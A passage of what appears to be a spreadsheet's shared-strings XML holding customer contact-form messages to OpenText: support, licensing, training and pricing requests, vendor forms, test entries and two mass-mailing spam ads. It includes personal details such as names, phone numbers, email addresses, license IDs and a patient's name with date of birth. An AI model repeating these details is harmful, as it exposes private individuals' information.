1. May you solve the issue? Currently, the recipient receives only a disclaimer as if it were coming from LONDON ( I can send a copy if you wish )._x000D_
2. Can you send us a login / password for the csptracker site?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Alain</t>
  </si>
  <si>
    <t>My name is Omar Halaseh I am the CTO of Optimiza a Systems Integrator in Jordan._x000D_
We are working with high profile security entity who uses Encase product for their daily case work of forensic investigations of devices. The process is working fine, however we are now helping them with extracting all possible readable information for the raw images where they have all raw images from previous investigations and your format is one of many other format for other forensics vendors. The extracted files from raw images will then be ingested into their big data platform for future investigations covering forensics and other things._x000D_
_x000D_
Now the questions is: do you have an SDK/API for reading the raw image and extracting all possible information from it which we can use in batch mode to run it against their backlog images without have using interaction?_x000D_
_x000D_
Please advise, I appreciate your help._x000D_
_x000D_
Best Regards_x000D_
Omar</t>
  </si>
  <si>
    <t>Hi All,_x000D_
We would like to have some information on the cost and timing for a course in our permises._x000D_
We are interested in the 4-0140 OpenText Content Server IDE (CSIDE) Fundamentals v16.2._x000D_
Thanks in dvance for your cooperation._x000D_
Best Regards_x000D_
Igor</t>
  </si>
  <si>
    <t>We need to register for e invoicing for BMW supplies. Need support.</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Hi,_x000D_
I was wondering if the pictures that were taken during the conference in Vienna will be published somewhere?_x000D_
Or if it is possible to get the pictures that were taken of me?</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Our Customer number is 74110._x000D_
We receive your invoices by email and mail. Please make sure we receive only by email which is enough and more eco-friendly._x000D_
Moreover, Please remove the name Gilbert Folcher as our contact. He left the company several years ago. You can put the name of our DSI : François Flandin._x000D_
_x000D_
Thank you in advance._x000D_
Best Regards._x000D_
Celine Amore</t>
  </si>
  <si>
    <t>Hi_x000D_
Can you send me the details on_x000D_
OpenText™_x000D_
VIM - Processing and waiting times in the productivity report are not matching the history log of the DP Document _x000D_
Article ID:KB474515_x000D_
VIMI-13646</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir suchen derzeit in unserem Unternehmen nach einem gutem Dokumentenmanagementsystem, das wir Gruppenweit einsetzen wollen als Archiv und Vorlagenverwaltung._x000D_
Unser spezieller Augenmerk liegt hierbei auf Schnittstellen und einer Funktion die es ermöglicht Kopf- und Fußzeilen per Default einzelnen Dokumenten vorzugeben._x000D_
 Mir ist das Programm "OpenText Content Suite Platform" aufgefallen und konnte leider nicht herauslesen, daher meine Frage, ob dieses Programm die oben genannten Kriterien erfüllt._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Michael Tratz_x000D_
Business Development</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
       I would like to apply for ( SAP Open text) VIM 7.5  certification. Should I attend boot camp or any online learning service is available,if so what is the exact name of the course and charges (Price) of the same? Thanks and Regads,PADI </t>
  </si>
  <si>
    <t>We are looking for below training : _x000D_
1. 4-4202 OpenText MBPM 9.x Foundation_x000D_
2. 5-4210 OpenText MBPM 9.x Certification_x000D_
_x000D_
Can someone from your team contact us soonest ? This is the 3rd time I am writing in for the same subject.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We have 4,934 Ready-To-Buy Oracle BI Software Technology Customers List from Australia._x000D_
_x000D_
Test file will be given to review and check quality._x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
Thank You,_x000D_
Regards,_x000D_
_x000D_
Alisha Vasquez_x000D_
</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
My name is Michael Dohan, and I am an Information Systems professor at Lakehead University._x000D_
_x000D_
I was curious, do you offer access to your software at all for educational purposes, for instance if we were to use it in some of our classes?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Currently I am working in Deloitte, I was part of OpenText team working for US based energy company.  Could you help me how should I get access/download Opentext 16.3 text books.      _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sir/madam, _x000D_
Do you provide any summer imternships for 3rd year computer science students.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Evening  team :_x000D_
_x000D_
please need you  to  grant me access to  catalogue  , your help is very appreciated  </t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Ciao! There is an interesting offers for you. I can help you with sending  your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. The same way you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
All the best _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in engaging consulting services to help  with our AppXtender 8.1 implementations. </t>
  </si>
  <si>
    <t xml:space="preserve">I've notice that there is an update of Encase to version 8.08.  Why haven't I been notified and allowed to upgrade?  I'm current on my licenses.  </t>
  </si>
  <si>
    <t>Our district is attempting to add you as a vendor, in order for this to be complete we need to obtain a W-9 form. _x000D_
_x000D_
Can you please send me a completed W-9 for your business?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Seth Coalwell_x000D_
Purchasing Assistant II_x000D_
916-793-2451_x000D_
scoalwel@egusd.net</t>
  </si>
  <si>
    <t>Hi, I have a TD3 forensic duplicator. Now I have to duplicate an Apple ssd, can I use a PCIe Adapter for Apple SSD [TDA7-3] with a TD3?_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to gather some how to documentation for Brava Desktop but I am unable to access your Knowledge Base. It keeps saying I have to activate my email but I have activated 3 times. Can I please get some information on how to use Brava. We have many users in the company that want to know how to use their new software. </t>
  </si>
  <si>
    <t>Gostaria de entender com mais detalhes as soluções que oferecem às seguradoras e, principalmente, se a solução ECM contemplaria o envio de todas as comunicações com os clientes (apólices, endossos, cancelamentos etc).</t>
  </si>
  <si>
    <t>Looking at your cloud rightfax offerings.  We currently have an old instance of rightfax and would like to drop the t1 or PRI that we use.  We like how the software works just don't want to deal with dropped or failed international faxes.</t>
  </si>
  <si>
    <t>GT</t>
  </si>
  <si>
    <t>I need to pay my bills but Icant acces to Support...</t>
  </si>
  <si>
    <t xml:space="preserve">I have been approved to take the exam and am trying to register. After I click the $200.00  Add to Cart and then I click the link to Register it says Access Denied. </t>
  </si>
  <si>
    <t>I'm working with a client to digitize a few tens of thousdands of paper forms.  We're not sure if it would make practical sense to digitize them or continue storing the hard copies.  Could someone please reach out to discuss?  Thank you.</t>
  </si>
  <si>
    <t>I am needing help with a quote for 2 Open Text Brava DWG Viewer (CAD)._x000D_
Please give me a call back as soon as possible._x000D_
Can you competitively price SKU 100029115?</t>
  </si>
  <si>
    <t>We have a need to have a 3rd party compare 2 source codes for us. The 1st source code is a copy of a web application written 10 years ago. The second source code is a copy of the same web application in it's current state. We have to prove that the 2 applications are entirely different and not the same application anymore. Is this something OpenText can help us with?</t>
  </si>
  <si>
    <t>My name is Jay Ellsworth.  I work for Ensono, the managed services provider supporting the mainframe for Lincoln Financial Group.  The Procurement team (Rebecca Ake) from Lincoln reached out to Victoria Zarganis at Open Text about mainframe license keys for an upgrade we are performing this weekend.  Victoria asked that a ticket be opened.  We are adding capacity to the existing mainframe and looking to learn if we need to apply a new license key for Open Text.  Who could help me with this?</t>
  </si>
  <si>
    <t>Amway North America currently is working on a project to replace our current web site.   As part of this project we are migrating our existing Actuate11 External reporting capabilities from our current web site to the new one.  During this migration we have been researching the possibility of decommissioning our existing LDAP store used by this reporting solution and to replace it with some other security solution utilizing the Actuate Report Server Security Extension (RSSE)._x000D_
_x000D_
We would like to discuss with you this development effort and inquire about your Professional Services availability to assist us in this development effort. _x000D_
_x000D_
Will you please coordinate a conference call with your OpenText resources to discuss this with us next week Monday or Tuesday if possible. _x000D_
_x000D_
If you would like to discuss this please call me at 616-787-1867.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a highly motivated translator, and culturally-sensitive linguist with a long experience as an in-house and freelance translator, reviser and linguistic consultant for Fortune 500 companies._x000D_
I am detail oriented, dynamic and very curious._x000D_
With every project I undertake, I assure high quality work, strict adherence to deadlines and an accurate adaptation to the targeted market while preserving each and every brand's DNA._x000D_
_x000D_
Fields of expertise:_x000D_
Marketing / Digital communication_x000D_
Fashion / Haute Couture / textile_x000D_
Cosmetics / Make-up_x000D_
High Jewelry &amp; watchmaking _x000D_
Emerging technologies / Social media_x000D_
Software_x000D_
Social and solidarity economy _x000D_
Renewable energies_x000D_
Legal _x000D_
Socio-political_x000D_
 Tourism / food / beverages industries_x000D_
</t>
  </si>
  <si>
    <t>Hello, I attempted to apply online for the IT Operations Manager position in Waterloo but wasn't sure it saved anything, and I didn't get any kind of email confirmation - could you possibly confirm receipt of my resume and cover letter?</t>
  </si>
  <si>
    <t>Looking for the ability to create accounts via API.  Is this possible?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I was redirected to this site from Guidance Encase site._x000D_
I would like to downloa the free  Encase Forensic Imager, but it seems not available here._x000D_
Could You please help me?_x000D_
Thanks in advance_x000D_
A.A._x000D_
</t>
  </si>
  <si>
    <t>UM</t>
  </si>
  <si>
    <t>I need money</t>
  </si>
  <si>
    <t xml:space="preserve">We have a requirement of a DAM solution to archive our Audio &amp; video content. When we upload the content the uploader will also add meta tags and submits. This content is forwarded within the system automatically to an approver based on pre defined approval matrix. The approver should be able to edit the meta tags, or reject the content. There could be 2 levels of approvers. </t>
  </si>
  <si>
    <t>Test</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I sent this email to supportrenewals@opentext.com and have not received an answer- Please advise - I sent as a link, but you don't allow links here- please contact me - who should I send this to?_x000D_
I have req # 1811341from our IT Dept. at CSUN. We don’t have Open Text in our vendor database. We have Guidance Software, however it appears that you are now Open Text. If you will be billing us as Open Text then the PO needs to match the name on the invoice. _x000D_
Please complete a Vendor-Data-Record 204 form for Open Text.  We cannot proceed with the purchase order or deliver payment until this information is entered into our database. Please access the link below to review and email it back to me at dglassberg@csun.edu  asap.. _x000D_
 _x000D_
  _x000D_
Doris Glassberg – Buyer III   _x000D_
Purchasing &amp; Contract Administration_x000D_
California State University Northridge_x000D_
18111 Nordhoff Street_x000D_
Northridge, CA  91330-8231_x000D_
Ph: 818/677-6538     fax: 818/677-6544 _x000D_
dglassberg@csun.edu    _x000D_
</t>
  </si>
  <si>
    <t>Hi, We are holding the product ECM appxtender and captiva tools for our Accounting team from EMC. Now we are using older version and wish to upgrade with latest technology and version and wish to know the Support options for the existing modules, as well for upgrading options.</t>
  </si>
  <si>
    <t>I would like to discuss capability for your product.</t>
  </si>
  <si>
    <t>We are currently in the process of an xpression upgrade and I am requesting temporary software licenses.</t>
  </si>
  <si>
    <t>Need update for DWG viewer program on my desktop</t>
  </si>
  <si>
    <t>MS</t>
  </si>
  <si>
    <t>The person who was in charge of cyber forensics has left our agency. I found the packing slip for Forensic 8 Examiner, order date Jun 27, 18 order # 1340426, po # 4000304491 ordered item 80320160ek, serial # g3002095453. Can you tell me the license numbers, any license keys, end date of product and cost of resubscription? Thank you.</t>
  </si>
  <si>
    <t>I have contacted previously requested more information on becoming an Opentext partner but have not heard back. We currently sell CCM / CX solutions via a SaaS model using the Quadient stack. We are looking to expand our offering and I wanted to find out more about OpenText.</t>
  </si>
  <si>
    <t>SR</t>
  </si>
  <si>
    <t>BC</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! Here is  a good offers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Mailing is made in the same way you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
Thanks for reading.</t>
  </si>
  <si>
    <t>Hastings Mutual uses Easylink Netmoves and have been off contract for many years.  I like to get a quote to maintain our service with Easylink/Opentext.  Please look at our existing service quote a 3 year contract.  Billed Account 061237-000.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to pay our bill - # 080_34679, I've registered (obviously) but I do not see an option to do that once I am logged in.  I do not know who initially set this account up so I do not know who to see about changing my access to allow me to pay the bill.  Any help is appreciated. </t>
  </si>
  <si>
    <t>We purchase Brava desktop from you and was wondering if you have a floating licence edition based on number of users?</t>
  </si>
  <si>
    <t xml:space="preserve">I am told that Parexel has enterprise-level support and I have tried to access the system where I can see all open ticket's for Parexel (or at least for those systems My team supports) and have been unable to get through the proper screens to gain that access.  _x000D_
_x000D_
In one attempt I was asked to provide some information and at that time I was unable to...now seem to be unable to find that screen to complete those fields.  I believe this is the information needed to enable the access I need.  Here is the information I have received from co-workers regarding their access: _x000D_
_x000D_
Product line – Documentum_x000D_
End user number  - EU0000529_x000D_
Name of co-worker – Zita Locke or Don Salters_x000D_
System ID/serial number/PIN/VPS:  [unsure about this]_x000D_
Company is Parexel International LLC_x000D_
_x000D_
Can you help me resolve this and help get me set up to access the resources I need?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Joe McFadden_x000D_
Manager, Technology Run Services_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">we're trying to track down faxes that showed sent on the receiver, but we never got them_x000D_
1) KELLY HELMS, 3HC MARKETER, SENT FAX ON 3/13/19 VIA DOC SCAN FROM HER PHONE AND EMAILED TO 8666425791@FAX2MAIL.COM_x000D_
2) SMOC IN CLINTON- STATES PATIENT NAME WAS Phyllis Winstead DOB 4/1/53.  "Will send the referral to your email.  Was sent on the 12th to fax number 866-642-5791 with confirmation it went through on our end.  Thanks for following up on it."_x000D_
3) AARON MURPHY STATES SHE SENT 7 REFERRALS ON 3/14/19 AND 5 DID NOT COME THROUGH. SHE SAID SHE SENT THEM ALL AT THE SAME TIME. I AM NOT SURE IF SHE USED DOC SCAN AND EMAIL TO 8666425791@FAX2MAIL.COM OR IF SHE USED THE SCAN TO VP AT CCHH. I HAVE LEFT HER A MESSAGE ON THAT._x000D_
4) FAYETTEVILLE VA SENT 2 FAXES YESTERDAY AND WENDY SAID ONLY 2 PAGES CAME THROUGH 1 TIME. THIS MORNING THEY SENT TO THE CORPORATE FAX AND THE ENTIRE REFERRAL DID COME THROUGH OK._x000D_
</t>
  </si>
  <si>
    <t>TEST</t>
  </si>
  <si>
    <t>TESTING</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I’m reaching out because we help BPOs use Zendesk. 729 is the premier services partner to Zendesk helping you and your customers make the most of this great tool. If you are interested in improving agent efficiency, updating your software or have customers asking about Zendesk and would like to have a chat please let me know._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Scotland Miller</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
We need some assistance with the reorganisation of our ECM folders._x000D_
Can you please help ?</t>
  </si>
  <si>
    <t>I would like to understand the OpenText solution especially related to integration with SAP for Vendor Invoice process.</t>
  </si>
  <si>
    <t>I do not have access to My Support site, and the confirmation email does not seem to solve the problem. Could you check how I could get access?</t>
  </si>
  <si>
    <t>Wanted to know if Brava! Desktop 2.2 is compatible with Windows 10</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
I want to verify maintenance for our Brava Desktop licensing server is current._x000D_
_x000D_
Regards,_x000D_
Duane Gardner</t>
  </si>
  <si>
    <t>HU</t>
  </si>
  <si>
    <t>Dear Support!_x000D_
_x000D_
Please help me, because I have a problem with my EnCase licence renewal and my account. I can see only "Server error" message, when I login with my account on opentext website "My Support". So I do not see anything about my Encase license information. _x000D_
I would like some informaition about my Encase license._x000D_
How can I see my license information? How can I download my license key file and the latest EnCase program install files?_x000D_
_x000D_
My account/user ID is: expert.services.digital@nbsz.gov.hu_x000D_
My EnCase license ID is: V7G2002061378_x000D_
_x000D_
Thank you for your help!_x000D_
_x000D_
László</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
This is probably an odd request. One of your products was renamed a while ago from hummingbird and the domain hummingbird(dot)com has been redirected._x000D_
_x000D_
Has the redirect been in place long enough for you to consider selling it? _x000D_
Happy to have a call if you'd like to discuss, or verify I'm not a robot/ dethroned prince etc..._x000D_
_x000D_
Many thanks_x000D_
_x000D_
Martyn_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Wij ontvingen factuur 9000904895 dd 24-12-2018 inclusief 21% BTW. Omdat het een intracommunautaire levering van diensten betreft vanuit Nederland aan België vermoeden wij dat de factuur zonder BTW moet opgesteld worden en Crelan gehouden is de BTW in België te betalen. Is het mogelijk een aangepaste factuur te bezorgen a.u.b.. Dank Alvast. Vriendelijke groet. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen,_x000D_
_x000D_
we, Prianto GmbH, are an international acting software distributor. In this case one of our reseller partners wants to purchase _x000D_
_x000D_
following product(s): OpenText Hummingbird exceed 14.0_x000D_
Customer in France_x000D_
_x000D_
Please quote us reseller prices/discount rates for above position(s) and tell us also about the _x000D_
 _x000D_
-           product description_x000D_
-           SKU number if available_x000D_
-           is it perpetual or subscription licensing model? Are there both options?_x000D_
-           are there any maintenance/support options available?_x000D_
-           in case of maintenance/support options - does maintenance/support end after a period automatically or does it automatically extend for another period; please tell us about termination conditions_x000D_
-           the way you deliver this_x000D_
-           times of delivery and/or handling_x000D_
-           the costs of freight/handling/customs_x000D_
-           availability of goods_x000D_
-           is it possible to setup end user as your license partner – not ours? We are only invoice recipient _x000D_
-           your company imprint/invoicing address to setup you as our new vendor/creditor_x000D_
_x000D_
It could be additionally helpful if you can send us also an overview (pricelist with list price and our conditions/purchase prices) of your products which could be interesting for us as a potential reseller partner from you._x000D_
_x000D_
Thank you very much -_x000D_
kind regards,_x000D_
</t>
  </si>
  <si>
    <t>TZ</t>
  </si>
  <si>
    <t>Hi, i live in ethiopia i am Shareholer and representative of yenbery business center plc. I want to attend enterprise world 09..11, 2029 but i need invitation letter for visa process please can you help me?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText Team,_x000D_
_x000D_
We would like to use OpenText Composer CipherSoft automation tool for Oracle Forms to Java conversion. Can you please share the licensing modals available for its usage? Thanks _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We use xPression for one of our client for document generation. End user info is Ent. Services Australia Pty Ltd - EU0322893 410 Concord Rd Rhodes, NSW, 2138 Australia_x000D_
_x000D_
During migration of one development server we found that after IP change the xPression license stopped working. So we assume license is based on the IP address of the development server. We need assistance in migrating the license from 1 server to another._x000D_
_x000D_
We tried contacting Tony Holland | Senior Account Manager | Mob: +61 448 145 756 | e-mail: tholland@opentext.com    but unable to reach._x000D_
Can you please advise._x000D_
</t>
  </si>
  <si>
    <t>TW</t>
  </si>
  <si>
    <t>I have sent a lot of letters, I can't use my Supports to open the ticket and ask questions, please help me.</t>
  </si>
  <si>
    <t>QLD</t>
  </si>
  <si>
    <t>Can you host and support Alchemy Document Server 16 in your cloud? If so what are the cost and other details.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I would like to correspond with someone in the marketing team to seek permission to republish one of your case studies. I'd be grateful if you could connect me through to the right person so I can more fully explain my request._x000D_
</t>
  </si>
  <si>
    <t>Let me introduce you more to the project scope. MOP (ministry of petroleum &amp; mineral resources in Egypt) overlooks around 150 companies, so our use case of your platform would be to have a unified public place where all sector employees (around 250K users, where the fair majority do not have email access) can connect to. also we need to have a seperate place for every company, so that's a total of around 150 spaces, pages ..... etc. where each page has only the contents of its company members and is enclosed to its employees alone._x000D_
_x000D_
Being a governmental organization, we have a set of critical features that must be present in your platform, so allow me to list those for you so that we both understand how to move forward:_x000D_
_x000D_
# Your solution needs to support On-Premise Installation_x000D_
# Your solution needs to support Arabic Language and Right to Left Orientation_x000D_
# Login needs to be with unique ID number (not relying on customizing username)_x000D_
# SMS Notifications  are supported for stuff like password reset or important content push notifications_x000D_
# Process Models Certificates awarded to your software  (Optional)_x000D_
# Maximum number of concurrent users ever recorded on the platform_x000D_
# Native Mobile Apps , Web Based Access, Desktop Based App_x000D_
# Load Tests, Automation Tests_x000D_
# Comments Moderation and Workflow_x000D_
_x000D_
so if you guys are ready. me and my team would like to have a quick demo the soonest</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
We would like to align our company with OpenText to become Value Added Reselling partners and offer your software and services to our clients.  Kindly guide me with the process of how this could happen. _x000D_
</t>
  </si>
  <si>
    <t>I want to start using open text, but I have many questions about pricing and solutions</t>
  </si>
  <si>
    <t xml:space="preserve">How do I  sign and get my loan application approved_x000D_
</t>
  </si>
  <si>
    <t>I need to get one quote for OpenText explorer 10 upgrade licences and 2 new licences purchases.  Then a separate quote for 3 upgrade licences.</t>
  </si>
  <si>
    <t>opentext fax2mail for healthcare inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">We are moving to OpenText this year and have Content Suite ready to install. We have need of a wiki-type application that we can use to store large operations manuals (hyperlinks imbedded). Is there someone at the Seattle office I can talk to about options? I worked with Shelley Riley at my previous position but I can't find her contact information. </t>
  </si>
  <si>
    <t>Hello,_x000D_
I am an ex-employee of OpenText (U: mayanks) and had worked at OpenText for ~4 years. I am trying to figure out who to contact regarding getting an Employment Verification Letter for my years at OpenText._x000D_
Kindly direct me to the right person to contact._x000D_
_x000D_
Regards,_x000D_
Mayank Sharma</t>
  </si>
  <si>
    <t>Hello, our ACH person is no longer with the company. How can I change the ACH emails from going to her email address to mine and if possible, one other?</t>
  </si>
  <si>
    <t>I need access to the admin console for Biogen users as the previous contact person (Troy Thomas) has left the company. Thanks, Suraj</t>
  </si>
  <si>
    <t>We would like to get some pricing for the RightFax product</t>
  </si>
  <si>
    <t>I have previously used Documentum as a process/workflow tool for managing third party agreements.  This was with a previous employer, but for my new employer, the process for onboarding new third party suppliers with my new employer is paper-based and not as efficient as it could be._x000D_
We are interested in a discussion and/or demonstration of the Documentum system as we are reviewing processes at RiverStone._x000D_
If I cannot be contacted at the number above, my alternative number is: 01273 792514_x000D_
Or I can be contacted by email, of course._x000D_
I look forward to hearing from you.</t>
  </si>
  <si>
    <t>We would like ti renew our support for OpenText Exstream and we expect to submit an RFI to resellers and would like to first discuss with an OpenText representative from Quebec about reseller services offerings and terms.</t>
  </si>
  <si>
    <t>I'm looking for pricing for a RightFax SaaS offering that we would be using from Azure</t>
  </si>
  <si>
    <t>Claudia Pereira. Hi Claudia I was trying to respond to your email but it was giving me back an error._x000D_
If you could forward on your e-mail again and I will send you a copy of our corporate wellbeing. There is no problem doing a food demo as I bring everything with me. Let me know what date you are looking for,_x000D_
Kind Regards,_x000D_
Jen</t>
  </si>
  <si>
    <t>GH</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon.  We are looking to get BI Query.  Please provide the following information.  Is this product freeware or is there a charge?  Also, please provide the license agreement for this product.  Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are interested in decommissioning SAP. We'd like to learn more about InfoArchive, process to move data and costs to store historical data in InfoArchive.</t>
  </si>
  <si>
    <t>Interested in Brava! and industry solutions for engineering documents</t>
  </si>
  <si>
    <t>Testing out the form</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in learning more about the Automated Output Accessibility Tool and PDF remediation support services offered by opentext. Spoke briefly with someone at CSUN but did not received a detailed pricing model for automation.  </t>
  </si>
  <si>
    <t xml:space="preserve">I need to know the training that aligns with the following product: EnCase Cybersecurity with Analytics </t>
  </si>
  <si>
    <t>Had instructions on how to monitor /determine if the are PRI errors but have misplaced them. Can someone help me out</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
We currently have SAP xECM, VIM, as well as document presentment licensed and I'd like to discuss what is offered in the cloud as we're moving from ECC 6.0 to S/4 Hana and are facing an upgrade to our OpenText solutions._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Justin </t>
  </si>
  <si>
    <t>If I choose to go through the boot camp, will I get unlimited access to the OnDemand, vClass, and Prep course material even after the class has ende​d? If so, how long? _x000D_
_x000D_
Also, there is a prequisite requirement for 64 hours of authorized Computer Forensic Training. Does this have to be completed through OpenText online training or could this be completed through other websites such FedVTE, Linux Academy, Udemy, Cybrary? If not, what training would met the 64 hour prereq?</t>
  </si>
  <si>
    <t>Do you have a product that will identify and redact PII, i.e., SSN, from images saved as a pdf?</t>
  </si>
  <si>
    <t>This is a training question.  Can a student attend any live class?  That is remotely?</t>
  </si>
  <si>
    <t>We have several users that can't login to Edocs (DM) in the past few days. We took a look at the updates, there were several that were applied on 3/15 (which is about when this started).  Is there any Windows update that could be causing this.  Please advise as users can not work._x000D_
_x000D_
Thank you!_x000D_
Geoff</t>
  </si>
  <si>
    <t>Looking for a quote for a 3rd party EDI solution for manufacturer that sells direct to retail.</t>
  </si>
  <si>
    <t>The Leidos programme i work for is running a project to integrate with our suppliers via EDI._x000D_
One of the suppliers uses GXS OpenText for their EDI message brokering - Joseph Gleave &amp; Son Ltd (GLN 5013546025777 qual 51)._x000D_
I would like some information on how we can get two GXS mailboxes, one for test data and one for production data for the purposes of EDI integration with suppliers._x000D_
Our GLN is 5060242031007.</t>
  </si>
  <si>
    <t>I want to sign up for self paced learning for Captiva but can't figure out our website for this.</t>
  </si>
  <si>
    <t>Please provide me a rep/contact I can discuss voice analytics/speech to text</t>
  </si>
  <si>
    <t>I have Brava! Desktop IXL and use it primarily for viewing and print AutoCAD drawings. While viewing has no issues, when I print, the fonts print light, not at all or partially. Same can be true when I print it or publish to a PDF. I have tried all the settings, gray scale, print black only, etc. No change. Need guidance. I have been using the Brava product for many years and no issues until the most recent upgrade.</t>
  </si>
  <si>
    <t>Für eine Schnittstelle Excel Office 365 zu SAP benötige ich eine VBA Objektbibliothek für den OpenText Imaging Windows Viewer 10.5.0. Können Sie hier weiterhelfen?</t>
  </si>
  <si>
    <t>We currently use the Alchemy Gold software.  What is the latest version release of the software?</t>
  </si>
  <si>
    <t>SD</t>
  </si>
  <si>
    <t>Trying to see if I can get a report of the faxes sent and received from our various numbers for January and February.  Just number, of, not specifics  10.60 w/fp3_x000D_
server ident 09554-12218</t>
  </si>
  <si>
    <t>Some users are unable to access Documentum due to Java blocking the site._x000D_
I would like to know the minimum requirement of Internet Explorer and Java to be installed on the user's system for further troubleshooting._x000D_
Documentum version 7.2_x000D_
Note: Already tried accessing Documentum with the latest version of Java on Internet Explorer 11.</t>
  </si>
  <si>
    <t xml:space="preserve">i would like to know the training available for ECM and how much it will cost </t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like pls to know if it is possible to have info about two different objects in the same template._x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I need help getting a vpat not listed on your VPAT page_x000D_
This fill in will not allow me to list your web page but I can provide when a person contacts me_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I cannot reach your page with the new production SSL Certificate Expiration for Data eXchange Platform (DXP) to download it. Can you send me this certificate by email to abykhanov@fsiedi.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I’m contacting you regarding our 12th Richmond Financial Industry Forum happening in Interlaken on 16-18 May 2019. Our forum is a business development forum based on 1-1 pre-organized meetings between delegates (c-level from swiss german private banks) and suppliers (companies like yours). I’ve contacted you as I’ve seen that a part of your customers and references are banks. If the delegates are your potential customers then the forum could be interesting for your actual business development strategy. If this is the case, let me know when you have time for a short phone call this week. </t>
  </si>
  <si>
    <t>Hi.  I encountered error upon logging-in.  Tried to reset the password but it says "Password update FAILED".</t>
  </si>
  <si>
    <t>I have Brava Desktop DX-P (Build 16-3-0-246). This software will not open Autodesk AutoCAD R2018 files. Is there an upgrade to do this?</t>
  </si>
  <si>
    <t>Dear. Mr,_x000D_
are you have office in Cairo Egypt_x000D_
if you have send me your contact please_x000D_
thanks</t>
  </si>
  <si>
    <t>We would like to inquire who your representative/distributor is in Qatar as we would like to schedule a demonstration of Open Text.</t>
  </si>
  <si>
    <t>Hi can you please send me a quote for EnCase Certified Examiner course please.</t>
  </si>
  <si>
    <t>Dear Madam/Sir,_x000D_
_x000D_
We are a focused and independent asset manager. Our objective is to deliver consistent, long-term asset growth for our clients._x000D_
_x000D_
Based on careful stock picking your company is now a unique part of our global portfolio._x000D_
_x000D_
C WorldWide Asset Management has holding shares in Opentext as of this email’s writing. _x000D_
_x000D_
Now that Opentext is a part of our global portfolio, we would like to update our presentations so that your company is also represented. _x000D_
_x000D_
As such, we would be grateful if you would send us your logo (for printing) _x000D_
_x000D_
